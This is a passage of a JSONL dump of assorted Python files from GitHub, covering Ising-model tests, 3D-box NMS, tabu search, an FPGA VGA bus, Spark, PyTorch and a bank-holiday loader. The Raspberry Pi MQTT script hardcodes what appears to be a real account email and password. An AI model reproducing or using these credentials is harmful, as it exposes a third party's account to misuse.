tuple(configuration)\n\n if configuration not in configuration_counts:\n configuration_counts[configuration] = 0\n\n configuration_counts[configuration] += 1\n\n kl_divergence = 0.0\n\n for configuration, count in configuration_counts.items():\n\n spins = np.array(configuration)\n\n minus_energy = (interaction_values*spins[edges[:, 0]]*\\\n spins[edges[:, 1]]).sum()\n\n true_logprob = minus_energy - logpf\n\n empirical_prob = count/sample_size\n\n kl_divergence += empirical_prob*(np.log(empirical_prob) - true_logprob)\n\n kl_divergences[-1][-1].append(kl_divergence)\n\n previous_sample_size = sample_size\n\n print('\\tdone with model {0}, {1:.2f} min.'.format(model_index + 1,\n (time.time() - start)/60))\n\n return np.array(kl_divergences)\n\ndef draw_kl_statistics(model_sizes, sample_log2_sizes, kl_statistics):\n\n figure = plt.figure(figsize=(8, 5), dpi=100)\n\n colors = ['r', 'g', 'b', 'c', 'm', 'y']\n\n for size_kl_statistics, size, color in zip(kl_statistics, model_sizes, colors):\n\n on_first_plot = True\n\n for model_kl_statistics in size_kl_statistics:\n\n plot_kwargs = {\n 'zorder': 0\n }\n\n if on_first_plot:\n plot_kwargs['label'] = 'N={}'.format(size)\n \n plt.plot(sample_log2_sizes, model_kl_statistics, color + '--',\n **plot_kwargs)\n plt.scatter(sample_log2_sizes, model_kl_statistics, color='k', s=10,\n zorder=1)\n\n on_first_plot = False\n\n plt.xlabel('$\\log_2 M$')\n plt.ylabel('KL-divergence')\n plt.legend()\n\n figure.savefig('k33free_kl.pdf', bbox_inches='tight')\n\ndef measure_execution_times(interaction_values_std, model_log2_sizes, models_per_size):\n\n execution_times = []\n\n main_start = time.time()\n \n for size in 2**model_log2_sizes:\n\n execution_times.append([])\n\n for model_index in range(models_per_size):\n\n graph = generate_k33free_graph(size)\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n inference_and_sampling = DecompInferenceAndSampling(graph)\n\n start = time.time()\n inference_and_sampling.prepare()\n inference_and_sampling.compute_logpf(interaction_values)\n inference_time = time.time() - start\n\n start = time.time()\n inference_and_sampling.prepare(sampling=True)\n inference_and_sampling.sample_spin_configurations(1, interaction_values)\n sampling_time = time.time() - start\n\n execution_times[-1].append([inference_time, sampling_time])\n\n print('done with size {0}, {1:.2f} min.'.format(size, (time.time() - main_start)/60))\n\n return np.array(execution_times)\n\ndef draw_execution_times(model_log2_sizes, models_per_size, execution_times):\n\n figure = plt.figure(figsize=(8, 5), dpi=100)\n\n inference_times = execution_times[:, :, 0].ravel()\n sampling_times = execution_times[:, :, 1].ravel()\n\n model_log2_sizes_per_point = np.repeat(model_log2_sizes, models_per_size)\n\n plt.scatter(model_log2_sizes_per_point, np.log2(inference_times), color='r', s=10,\n label='inference')\n plt.scatter(model_log2_sizes_per_point, np.log2(sampling_times), color='b', s=10,\n label='sampling')\n\n theoretical_complexity_points = 3*model_log2_sizes/2 - 7\n\n plt.plot(model_log2_sizes, theoretical_complexity_points, c='k',\n label='$O(N^{1.5})$')\n\n plt.xlabel('$\\log_2 N$')\n plt.ylabel('$\\log_2$(sec.)')\n plt.legend()\n\n figure.savefig('k33free_time.pdf', bbox_inches='tight')\n\nif __name__ == '__main__':\n\n interaction_values_std = 0.1\n\n simulate_and_test_logpf_computation(interaction_values_std)\n print()\n\n model_sizes = np.array([10, 25, 40])\n models_per_size = 10\n sample_log2_sizes = np.arange(1, 12)\n\n kl_statistics = collect_kl_statistics(interaction_values_std, model_sizes,\n models_per_size, sample_log2_sizes)\n print()\n draw_kl_statistics(model_sizes, sample_log2_sizes, kl_statistics)\n\n model_log2_sizes = np.arange(3, 12)\n models_per_size = 10\n\n execution_times = measure_execution_times(interaction_values_std, model_log2_sizes,\n models_per_size)\n draw_execution_times(model_log2_sizes, models_per_size, execution_times)\n","repo_name":"ValeryTyumen/planar_ising","sub_path":"tests/k33free_tests.py","file_name":"k33free_tests.py","file_ext":"py","file_size_in_byte":9781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"1680263625","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom goods.views import index_redirect\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^goods/', include('goods.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^$', index_redirect, name='index_redirect'),\n)\n","repo_name":"Effessio/catalog","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36048798520","text":"import logging\n\nimport numpy as np\nimport torch\nfrom pytorch3d.transforms import transform3d as t3d\n\nfrom detectron2.layers.nms import batched_nms_rotated\nfrom detectron2.structures import RotatedBoxes\n\nfrom tridet.structures.pose import Pose\n\nLOG = logging.getLogger(__name__)\n\n# yapf: disable\n# -------------------------------\n# Convention of reference frames.\n# -------------------------------\n# Rotation from \"camera\" frame to \"vehicle\" frame.\n# |------------------|--------------------------------|\n# | Camera | Vehicle | Interpretation in Vehicle frame|\n# |------------------|--------------------------------|\n# | z | x | forward |\n# | x | -y | right |\n# | y | -z | down |\n# |------------------|--------------------------------|\nCAMERA_TO_VEHICLE_ROTATION = Pose.from_matrix(np.float32([\n [ 0, 0, 1, 0],\n [-1, 0, 0, 0],\n [ 0, -1, 0, 0],\n [ 0, 0, 0, 1]\n]))\n\n# Rotation from \"vehicle\" frame to \"bev\" frame.\n# |------------------|---------------------------------|\n# | Vehicle | BEV | Interpretation in Vehicle frame |\n# |------------------|---------------------------------|\n# | x | -y | forward |\n# | y | -x | left |\n# | z | -z | up |\n# |------------------|---------------------------------|\nVEHICLE_TO_BEV_ROTATION = Pose.from_matrix(np.float32([\n [ 0, -1, 0, 0],\n [-1, 0, 0, 0],\n [ 0, 0, -1, 0],\n [ 0, 0, 0, 1]\n]))\n# yapf: enable\n\n\ndef boxes3d_to_rotated_boxes(\n boxes3d, pose_cam_global=CAMERA_TO_VEHICLE_ROTATION, pose_global_bev=VEHICLE_TO_BEV_ROTATION, use_top_surface=True\n):\n \"\"\"\n\n Parameters\n ----------\n boxes3d: Boxes3D\n 3D boxes in camera frame.\n pose_cam_global: Pose\n Transformation from sensor (camera) frame to global frame. Depending on the context, global frame can be\n \"vehicle\" frame which moves along with the vehicle, or \"world\" frame which is fixed in the world.\n By default, it is an axis-swapping rotation that convert pinhole camera frame to Vehicle frame, i.e.\n x: forward, y: left, z: up (see above for detail.)\n with no translation (i.e. moves along with camera).\n pose_global_bev: Pose\n Transformation from global frame to bird-eye-view frame. By default, \"forward\" matches with \"up\" of BEV image,\n By default, it is an axis-swapping rotation that converts Vehicle frame to BEV frame (see above for detail.)\n with no translation.\n \"\"\"\n if use_top_surface:\n vertice_inds = [0, 1, 5, 4] # (front-left, front-right, back-right, back-left) of top surface.\n else:\n # use bottom surface.\n vertice_inds = [3, 2, 6, 7] # (front-left, front-right, back-right, back-left) of bottom surface.\n\n surface = boxes3d.corners[:, vertice_inds, :]\n pose_cam_bev = pose_global_bev * pose_cam_global\n cam_to_bev = t3d.Transform3d(matrix=surface.new_tensor(pose_cam_bev.matrix.T)) # Need to transpose!\n # Assumpiton: this is close to rectangles. TODO: assert it?\n rot_boxes_bev = cam_to_bev.transform_points(surface)[:, :, :2]\n\n # length/width of objects are equivalent to \"height\"/width of RotatedBoxes\n length = torch.norm(rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 3, :], dim=1).abs()\n width = torch.norm(rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 1, :], dim=1).abs()\n\n center = torch.mean(rot_boxes_bev[:, [0, 2], :], dim=1)\n center_x, center_y = center[:, 0], center[:, 1]\n\n forward = rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 3, :]\n # CCW-angle, i.e. rotation wrt -z (or \"up\") in BEV frame.\n angle = torch.atan2(forward[:, 0], forward[:, 1])\n angle = 180. / np.pi * angle\n\n rot_boxes = RotatedBoxes(torch.stack([center_x, center_y, width, length, angle], dim=1))\n return rot_boxes\n\n\ndef bev_nms(\n boxes3d, scores, iou_threshold, pose_cam_global=CAMERA_TO_VEHICLE_ROTATION, class_idxs=None, class_agnostic=False\n):\n \"\"\"\n\n Parameters\n ----------\n boxes3d: Boxes3D\n 3D boxes in camera frame.\n\n scores: Tensor\n 1D score vector. Must be of same size 'boxes3d'\n\n iou_threshold: float\n Two rotated boxes in BEV frame cannot overlap (according to IoU) more than this threshold.\n\n class_idxs: Tensor or None\n If not None, 1D integer vector. Must be of same size 'boxes3d'\n\n class_agnostic: bool\n If True, then category ID is not considered in NMS.\n If False, then NMS is performed per-cateogry ('class_idxs' must not be None.)\n\n Returns\n -------\n keep: Tensor\n 1D integer vector that contains filtered indices to 'boxes3d' to keep after NMS.\n \"\"\"\n rot_boxes = boxes3d_to_rotated_boxes(boxes3d, pose_cam_global=pose_cam_global)\n if class_agnostic:\n class_idxs = torch.zeros_like(scores, dtype=torch.int64)\n else:\n assert class_idxs is not None\n keep = batched_nms_rotated(rot_boxes.tensor, scores, class_idxs, iou_threshold)\n return keep\n","repo_name":"TRI-ML/dd3d","sub_path":"tridet/layers/bev_nms.py","file_name":"bev_nms.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":413,"dataset":"github-code","pt":"40"} +{"seq_id":"2470973056","text":"import queue\n\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n\n graph, indegree = {}, {}\n for c in range(numCourses):\n graph[c] = []\n indegree[c] = 0\n \n for first, second in prerequisites:\n graph[second].append(first)\n indegree[first] += 1\n \n q = queue.Queue()\n for c in range(numCourses):\n if indegree[c] == 0:\n q.put(c)\n \n order = []\n while not q.empty():\n v = q.get()\n order.append(v)\n for c in graph[v]:\n indegree[c] -= 1\n if indegree[c] == 0:\n q.put(c)\n del graph[v]\n \n return order if graph == {} else []","repo_name":"oliverschwartz/leet","sub_path":"course_schedule/course_schedule_ii.py","file_name":"course_schedule_ii.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31558615482","text":"from cn.edustar.jitar.data import Command\r\nfrom cn.edustar.jitar.util import ParamUtil,CommonUtil\r\nfrom base_action import SubjectMixiner\r\nfrom cn.edustar.jitar.pojos import PrepareCourse, PrepareCourseEdit\r\nfrom java.text import SimpleDateFormat\r\nfrom java.util import Date\r\nfrom java.io import File\r\nfrom base_action import *\r\nfrom base_blog_page import *\r\nfrom action_query import ActionQuery\r\nfrom base_preparecourse_page import *\r\n\r\nclass show_preparecourse_history_content(PrepareCoursePageService):\r\n def __init__(self):\r\n self.printer = response.getWriter() \r\n self.pc_svc = __jitar__.getPrepareCourseService()\r\n \r\n def execute(self): \r\n self.getBaseData() \r\n if self.prepareCourseId == 0:\r\n self.printer.write(u\"无效的课程标识。\")\r\n return\r\n prepareCourse = self.getBasePrepareCourse()\r\n if prepareCourse == None:\r\n self.printer.write(u\"没有加载到所请求的备课。\")\r\n return\r\n if self.canView(prepareCourse) == False:\r\n self.printer.write(u\"您无权查看本内容。\")\r\n return\r\n \r\n prepareCourseEditId = self.params.getIntParam(\"prepareCourseEditId\")\r\n if prepareCourseEditId == None or prepareCourseEditId == 0:\r\n self.printer.write(u\"请选择一个共案历史记录。\")\r\n return\r\n prepareCourseEdit = self.pc_svc.getPrepareCourseEdit(prepareCourseEditId)\r\n if prepareCourseEdit == None:\r\n self.printer.write(u\"未能加载共案历史记录。\")\r\n return\r\n \r\n page = self.getPrepareCoursePageWithCustomSkin(prepareCourse)\r\n widgets = [\r\n {\"id\": \"1\", \"pageId\":0, \"columnIndex\":1, \"title\":u\"备课基本信息\", \"module\":\"show_preparecourse_info\", \"ico\":\"\", \"data\":\"\"},\r\n {\"id\": \"placerholder1\", \"pageId\":0, \"columnIndex\":2, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"},\r\n {\"id\": \"placerholder2\", \"pageId\":0, \"columnIndex\":1, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"},\r\n {\"id\": \"placerholder3\", \"pageId\":0, \"columnIndex\":1, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"}\r\n ]\r\n qry = PrepareCourseMemberQuery(\"\"\" u.userId, u.userIcon, u.loginName,u.trueName,u.nickName\"\"\") \r\n qry.prepareCourseId = self.prepareCourse.prepareCourseId\r\n user_list = qry.query_map()\r\n prepareCourseEdit_list = self.pc_svc.getPrepareCourseEditList(self.prepareCourseId)\r\n request.setAttribute(\"prepareCourseEdit_list\", prepareCourseEdit_list)\r\n request.setAttribute(\"user_list\", user_list) \r\n request.setAttribute(\"page\", page)\r\n request.setAttribute(\"widget_list\", widgets)\r\n request.setAttribute(\"prepareCourse\", prepareCourse)\r\n request.setAttribute(\"prepareCourseEdit\", prepareCourseEdit) \r\n if prepareCourse.contentType == 2 or prepareCourse.contentType == 3 or prepareCourse.contentType == 4 or prepareCourse.contentType == 5 or prepareCourse.contentType == 100:\r\n swf = prepareCourseEdit.content\r\n if swf == None:swf = \"\"\r\n if swf.find(\".\") > -1:\r\n swf = swf[0:swf.find(\".\")]\r\n \r\n prepareCourseFileServer = request.getSession().getServletContext().getInitParameter(\"PrepareCourseFileServer\")\r\n pcFolder = CommonUtil.GetPrepareCourseFolder(request)\r\n if prepareCourseFileServer == None or prepareCourseFileServer == \"\":\r\n swfUrl = pcFolder[1] + str(self.prepareCourse.prepareCourseId) + \"/\"\r\n courseFileServer = CommonUtil.getSiteUrl(request)\r\n else:\r\n if prepareCourseFileServer.endswith(\"/\") == False:prepareCourseFileServer += \"/\"\r\n courseFileServer = prepareCourseFileServer\r\n swfUrl = prepareCourseFileServer + \"preparecoursefolder/\" + str(self.prepareCourse.prepareCourseId) + \"/\"\r\n swfUrl = swfUrl + swf + \".swf\"\r\n request.setAttribute(\"swfUrl\", swfUrl)\r\n request.setAttribute(\"courseFileServer\", courseFileServer)\r\n \r\n response.setContentType(\"text/html; charset=UTF-8\") \r\n return \"/WEB-INF/ftl/course/show_preparecourse_history_content2.ftl\"\r\n","repo_name":"yxxcrtd/jitar2.0","sub_path":"WebContent/WEB-INF/preparecourse/show_preparecourse_history_content.py","file_name":"show_preparecourse_history_content.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10379683432","text":"import time\nimport datetime\nimport argparse\n\n\nstarting_time = time.time()\nversion = \"1.0.0\"\n# The argument\nparser = argparse.ArgumentParser(prog='main')\nparser.add_argument(\"--version\", required=True,\n help='Print the version of the code', action='store_true')\n\nargs = parser.parse_args()\nif args.version:\n print(f\"version: {version}\")\n\n\nendig_time = time.time()\ntime_diff = endig_time - starting_time\n\nflag = True\n\nwhile flag:\n print(\"{} Running for {:.2f} seconds\".format(\n datetime.datetime.now(), time_diff))\n time.sleep(5)\n time_diff += 5\n","repo_name":"ahadnur/git_auto","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29153793150","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 20 20:54:03 2021\n\n@author: Teoman\n\"\"\"\n\nimport time\nimport numpy as np\nfrom scipy.optimize import linprog\nimport random\n\ny=[80,90,110,120,100,120] #capacity list \n\nd_j=[36,42,34,50,27,30,43] #demand list\n\nyi=[220,240,260,275,240,230] #fixed cost\n\n#km cost list\nd_ij=[[18,23,19,21,24,17,9],\n [21,18,17,23,11,18,20],\n [27,18,17,20,23,9,18],\n [16,23,9,31,21,23,10],\n [31,20,18,19,10,17,18],\n [18,17,29,21,22,18,8]]\n\ndaily=[0.15,0.18,0.20,0.18,0.15,0.17] #daily cost\n\ndef calculate_cij(): #finds Cij\n new_cij=np.zeros((6,7))\n for j in range (7):\n for i in range (6):\n new_cij[i][j]=(d_ij[i][j]*0.06*2*d_j[j]+daily[i]*d_j[j])\n return new_cij \n\ndef create_solution():\n while True:\n solution=np.zeros(6)\n for i in range(6):\n solution[i]=random.choice([0, 1])\n if np.sum(np.array(y)*solution)>np.sum(d_j):\n break\n if np.sum(np.array(y)*solution)>np.sum(d_j):\n break\n random.shuffle(solution)\n opened_facilities=[]\n \n for i, j in enumerate(solution):\n if j == 1:\n opened_facilities.append(i)\n \n return(opened_facilities)\n\n\ndef simplex(opened_facilities,new_cij): #simplexi çöz\n v1=opened_facilities\n \n c=[] #objective function coeff\n coef_a=np.zeros((len(v1),len(v1)*7)) #capacity cons left side of equation\n a_esit=[] #capacity cons right side of equation\n coef_b=np.zeros((7,len(v1)*7)) #demand cons left side of equation\n b_esit=[1]*7 #capacity cons right side of equation \n sabit=0 #for adding demands\n \n for i in range(len(v1)):\n j=i*7\n coef_a[i][j:j+7]=d_j \n for i in range(7):\n coef_b[i][i::7]=[1]*len(v1)\n for i in v1:\n a_esit.append(y[i]) \n a_esit=np.array(a_esit) \n for i in v1:\n c.append(new_cij[i]) \n c=np.concatenate(c).ravel().tolist()\n for i in v1:\n sabit=yi[i]+sabit #adding capacities\n\n #solving simplex \n res=linprog(c,A_ub=coef_a,b_ub=a_esit,A_eq=coef_b,b_eq=b_esit,method='revised simplex')\n upper_b=round(res.fun, ndigits=2)+sabit\n x_ij=res.x\n x_ij=x_ij.round(3)\n x_ij=x_ij.reshape((len(opened_facilities) , len(d_j))) \n return upper_b,x_ij\n \ndef find_new_solutions(TabuList,FeasibleSet,opened,new_cij):\n cost=10000\n closed_one=[]\n added_one=[]\n for i in opened:\n for j in FeasibleSet:\n open_cand=opened.copy()\n open_cand.remove(i)\n open_cand.append(j)\n \n new_cost,new_x_ij=simplex(open_cand,new_cij)\n if new_costmaxSize:\n TabuList.pop(0)\n \n print(\"-------------------------\")\n print(\"iteration:\",h)\n print(\"opened facilities\",opened)\n print(\"FeasibleSet:\",FeasibleSet)\n print(\"tabu list:\",TabuList)\n print(\"x_ij:\")\n print(x_ij)\n print(\"iteration's cost:\",open_cost)\n print(\"current best\",CurrentBest)\n \n \n if open_cost==CurrentBest:\n break\n \n if open_cost < CurrentBest:\n CurrentBest = open_cost\n \n h+=1\n \n return(CurrentBest,opened)\n\nmain(2)\n\n\n ","repo_name":"teoinan/heuristic-methods","sub_path":"tabu_seach.py","file_name":"tabu_seach.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42338766341","text":"import torch\nfrom torch import nn\nfrom copy import deepcopy\n\nclass DenseBlock2d(nn.Module):\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n kernel_size: int = 3,\n stride: int = 1,\n padding: int = 1,\n dropout: float = 0.0,\n num_blocks: int = 1,\n normalization: nn.Module = None,\n ):\n super().__init__()\n\n convs = []\n\n for conv_idx in range(num_blocks):\n if normalization:\n convs.append(deepcopy(normalization))\n else:\n convs.append(nn.BatchNorm2d(in_channels))\n\n convs.append(nn.ReLU(inplace = True))\n \n if conv_idx == num_blocks - 1:\n convs.append(\n nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size = kernel_size,\n stride = stride,\n padding = padding,\n bias = False\n )\n )\n else:\n convs.append(\n nn.Conv2d(\n in_channels,\n in_channels,\n kernel_size = kernel_size,\n stride = stride,\n padding = padding,\n bias = False\n )\n )\n \n self.convs = nn.Sequential(*convs)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n y = self.convs(x)\n y = self.dropout(y)\n y = torch.cat([x, y], 1)\n return y\n\nif __name__ == '__main__':\n from torchinfo import summary\n block = DenseBlock2d(16, 32, 3, 1, 1, 0.5, num_blocks = 3, normalization = nn.GroupNorm(8, 16))\n summary(block, (8, 16, 64, 64))\n # print(block(torch.randn(8, 16, 64, 64)).shape)","repo_name":"braindotai/Dxeon","sub_path":"src/dxeon/modules/dense_block.py","file_name":"dense_block.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25263114334","text":"from nmigen import *\nfrom nmigen.hdl.rec import *\n\nfrom utils import bitcount\nfrom vga_timing import VGATiming\n\nclass VGALayout(Layout):\n def __init__(self, w: int, h: int):\n super().__init__([\n (\"hsync\", 1),\n (\"vsync\", 1),\n (\"visible\", 1),\n (\"x\", bitcount(w)),\n (\"y\", bitcount(h)),\n (\"r\", 1),\n (\"g\", 1),\n (\"b\", 1),\n ])\n\nclass VGABus(Record):\n def __init__(self, timing: VGATiming):\n layout = VGALayout(timing.vx, timing.vy)\n super().__init__(layout)\n self.timing = timing\n\n def forward(self, m: Module, src):\n m.d.comb += [\n self.hsync.eq(src.hsync),\n self.vsync.eq(src.vsync),\n self.visible.eq(src.visible),\n ]\n m.d.px += [\n self.x.eq(src.x),\n self.y.eq(src.y),\n self.r.eq(src.r),\n self.g.eq(src.g),\n self.b.eq(src.b),\n ]\n","repo_name":"quells/tiny-gfx","sub_path":"src/vga_bus.py","file_name":"vga_bus.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37575666730","text":"import sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\nfrom pyspark.sql import SparkSession, functions, types\n\n@functions.udf(returnType=types.StringType())\ndef path_to_hour(path):\n path_split = path.split('/')\n ex_from = len('pagecounts-')\n ex_to = ex_from + len('20160801-12')\n return path_split[-1][ex_from:ex_to] #format YYYYMMDD-HH\n\n\n\ndef main(inputs, output):\n wikipedia_schema = types.StructType([\n types.StructField('language', types.StringType()),\n types.StructField('title', types.StringType()),\n types.StructField('views', types.IntegerType()),\n types.StructField('bytes', types.IntegerType())\n ])\n\n wikipedia = spark.read.csv(inputs, sep = ' ', schema = wikipedia_schema).withColumn('filename', functions.input_file_name())\n wiki_with_hour = wikipedia.withColumn('hour', path_to_hour(wikipedia['filename'])) #add a column with its time: YYYYMMDD-HH\n\n filtered = wiki_with_hour.filter((wiki_with_hour['language'] == 'en') & (wiki_with_hour['title'] != \"Main Page\") & (wiki_with_hour['title'].startswith(\"Special:\") == False))\n wiki = filtered.cache()\n\n max_views = wiki.groupby('hour').agg(functions.max(wiki['views']).alias('views'))\n #joined = max_views.join(wiki, ['hour', 'views'],'inner') #without broadcast hint\n joined = wiki.join(max_views.hint('broadcast'), ['hour', 'views'])\n output_data = joined.select(joined['hour'], joined['title'], joined['views']).orderBy(joined['hour'], joined['title'])\n \n output_data.write.json(output, mode = 'overwrite')\n output_data.explain()\n\n\nif __name__ == '__main__':\n inputs = sys.argv[1]\n output = sys.argv[2]\n spark = SparkSession.builder.appName('wikipedia popular df').getOrCreate()\n assert spark.version >= '3.0' # make sure we have Spark 3.0+\n spark.sparkContext.setLogLevel('WARN')\n sc = spark.sparkContext\n main(inputs, output)\n","repo_name":"xxxibdara/Big_Data_Works_732","sub_path":"A6/wikipedia_popular_df.py","file_name":"wikipedia_popular_df.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74330852601","text":"from Facade import *\n\n\ndef CalibreCropping(filename):\n lol = Facade(filename)\n lol.img_editor.crop(crop_params)\n cv2.imshow(\"lol\", lol.img_editor.img)\n cv2.waitKey()\n\n\n# CalibreCropping(\"misha1.jpg\")\n\nlol1 = Facade(\"misha1.jpg\")\n# lol2 = Facade(\"v-26.jpg\")\n\nlol1.write_finger_scan(\"lol81.jpg\")\n# lol2.write_finger_scan(\"lol73.jpg\")\n\n# print(CompareFingerScans(lol1, lol2))\n","repo_name":"Ulyana75/FingerScaner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2869324324","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport paho.mqtt.client as mqtt\r\nfrom datetime import datetime\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nbtn1=12\r\nbtn2=13\r\nled1=7\r\nled2=11\r\nf=open(\"Datos.dat\",\"a\")\r\nf.write(\"Datos recolectados\\n\")\r\nf.close()\r\n\r\ndef on_message(client,obj,msg):\r\n print(msg.topic+\" \"+str(msg.qos)+\" \"+msg.payload.decode('utf-8'))\r\n\r\ndef main():\r\n bot1=0\r\n bot2=0\r\n mqttc=mqtt.Client()\r\n mqttc.on_message=on_message\r\n mqttc.username_pw_set(\"jomsk@hotmail.com\",\"Jomsk4all1996\")\r\n mqttc.connect(\"maqiatto.com\",1883)\r\n mqttc.subscribe(\"jomsk@hotmail.com/IoT1\",0)\r\n GPIO.setup(led1,GPIO.OUT)\r\n GPIO.setup(led2,GPIO.OUT)\r\n GPIO.setup(btn1,GPIO.IN)\r\n GPIO.setup(btn2,GPIO.IN)\r\n nbtn=0\r\n while(1):\r\n mqttc.loop()\r\n bot1=GPIO.input(btn1)\r\n bot2=GPIO.input(btn2)\r\n f=open(\"Datos.dat\",\"a\")\r\n fecha=datetime.now()\r\n fechaAc=str(fecha).split(\".\")[0]\r\n if(bot1==1):\r\n \r\n GPIO.output(led1,1)\r\n f.write(fechaAc+\" Boton1 Presionado\\n\")\r\n f.close()\r\n time.sleep(1)\r\n GPIO.output(led1,0)\r\n nbtn=1\r\n mqttc.publish(\"jomsk@hotmail.com/IoT\",str(nbtn))\r\n \r\n if(bot2==1):\r\n \r\n GPIO.output(led2,1)\r\n f.write(fechaAc+\" Boton2 Presionado\\n\")\r\n f.close()\r\n time.sleep(1)\r\n GPIO.output(led2,0)\r\n nbtn=2\r\n mqttc.publish(\"jomsk@hotmail.com/IoT\",str(nbtn))\r\n \r\n \r\n ","repo_name":"jdvelin96/congenial-engine","sub_path":"static/js/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34978885989","text":"import tensorflow as tf \r\nimport numpy as np\r\n\r\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0]) \r\nys = np.array([-3.0, -1.0, 1.0, 3.0, 5.0, 7.0]) \r\n\r\n#trainable variables \r\nw = tf.Variable(np.random.random(), trainable=True) \r\nb = tf.Variable(np.random.random(), trainable=True) \r\n\r\n\r\n# loss \r\ndef simple_loss(real_y, pred_y) : \r\n return tf.abs(real_y - pred_y) \r\n\r\nlearning_rate = 0.001\r\n\r\ndef fit_data(x_real, y_real): \r\n\r\n with tf.GradientTape(persistent=True) as tape: \r\n pred_y = w * x_real + b \r\n reg_loss = simple_loss(y_real, pred_y) \r\n\r\n w_gradient = tape.gradient(reg_loss, w) \r\n b_gradient = tape.gradient(reg_loss, b) \r\n\r\n w.assign_sub(w_gradient * learning_rate) \r\n b.assign_sub(b_gradient * learning_rate) \r\n\r\n\r\nfor _ in range(500) : \r\n fit_data(xs, ys) \r\n\r\nprint(f\"w = {w.numpy()} + b = {b.numpy()}\") ","repo_name":"sasidhar-programmer/Tensorflow_Advance_Techniques","sub_path":"2-custom_and_distributed_training/pratice_py/2_gradient_tape.py","file_name":"2_gradient_tape.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"} +{"seq_id":"5746970657","text":"import datetime\nimport functools\nimport gettext\nimport json\nimport logging\nimport pathlib\n\nimport requests\n\n__all__ = ('BankHolidays',)\nlogger = logging.getLogger(__name__)\n\n\nclass BankHolidays:\n \"\"\"\n Tool to load UK bank holidays from GOV.UK (see https://www.gov.uk/bank-holidays)\n\n NB: Bank holidays vary between parts of the UK so GOV.UK provide separate lists for different \"divisions\".\n Methods of this class will default to only considering bank holidays common to *all* divisions\n unless a specific division is provided.\n \"\"\"\n\n source_url = 'https://www.gov.uk/bank-holidays.json'\n\n # division constants\n ENGLAND_AND_WALES = 'england-and-wales'\n SCOTLAND = 'scotland'\n NORTHERN_IRELAND = 'northern-ireland'\n ALL_DIVISIONS = (ENGLAND_AND_WALES, SCOTLAND, NORTHERN_IRELAND)\n\n @classmethod\n def load_backup_data(cls):\n backup_path = pathlib.Path(__file__).parent / 'bank-holidays.json'\n with backup_path.open() as f:\n return json.load(f)\n\n def __init__(self, locale=None, weekend=(5, 6), use_cached_holidays=False):\n \"\"\"\n Load UK bank holidays\n :param locale: the locale into which holidays should be translated; defaults to no translation\n :param weekend: days of the week that are never work days; defaults to Saturday and Sunday\n :param use_cached_holidays: use the cached local copy of the holiday list\n \"\"\"\n self._get_known_holiday_date_set_cache = {}\n self.weekend = set(weekend)\n if use_cached_holidays:\n data = self.load_backup_data()\n else:\n try:\n logger.debug(f'Downloading bank holidays from {self.source_url}')\n data = requests.get(self.source_url).json()\n except (requests.RequestException, ValueError):\n logger.warning('Using backup bank holiday data')\n data = self.load_backup_data()\n\n if locale:\n trans = gettext.translation(\n 'messages',\n localedir=pathlib.Path(__file__).parent / 'locale',\n languages=[locale],\n fallback=True,\n )\n else:\n trans = gettext.NullTranslations()\n trans = trans.ugettext if hasattr(trans, 'ugettext') else trans.gettext\n\n def _(text):\n if not text:\n return text\n return trans(text)\n\n def map_holiday(holiday):\n try:\n return {\n 'title': _(holiday['title']),\n 'date': datetime.datetime.strptime(holiday['date'], '%Y-%m-%d').date(),\n 'notes': _(holiday.get('notes', '')),\n 'bunting': 